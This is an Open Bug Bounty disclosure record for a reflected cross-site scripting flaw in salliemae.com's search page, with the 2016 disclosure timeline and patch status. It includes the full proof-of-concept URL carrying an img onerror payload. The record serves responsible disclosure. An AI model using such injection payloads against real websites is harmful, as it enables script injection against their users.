Vulnerable URL:
https://www.salliemae.com/search/?Ntt=%3Cimg%20src=x%20onerror=prompt%28/OPENBUGBOUNTY/%29%3E&Ntk;=all_fields&N;=0
Details:
Description |
Value |
Patched: |
Yes, at |
Vulnerability type: |
XSS |
Vulnerability status: |
Publicly disclosed |
Alexa Rank |
13916 |
VIP website status: |
Yes |
Check salliemae.com SSL connection: |
(Grade: A) |
Coordinated Disclosure Timeline:
Description |
Value |
Vulnerability submitted via Open Bug Bounty |
30 August, 2016 11:58 GMT |
Generic security notifications sent to website owner |
30 August, 2016 12:00 GMT |
Notification sent to subscribers (without technical details) |
30 August, 2016 14:17 GMT |
Vulnerability details disclosed by researcher |
6 September, 2016 12:12 GMT |
Vulnerability patched by the website owner |
27 September, 2016 14:34 GMT |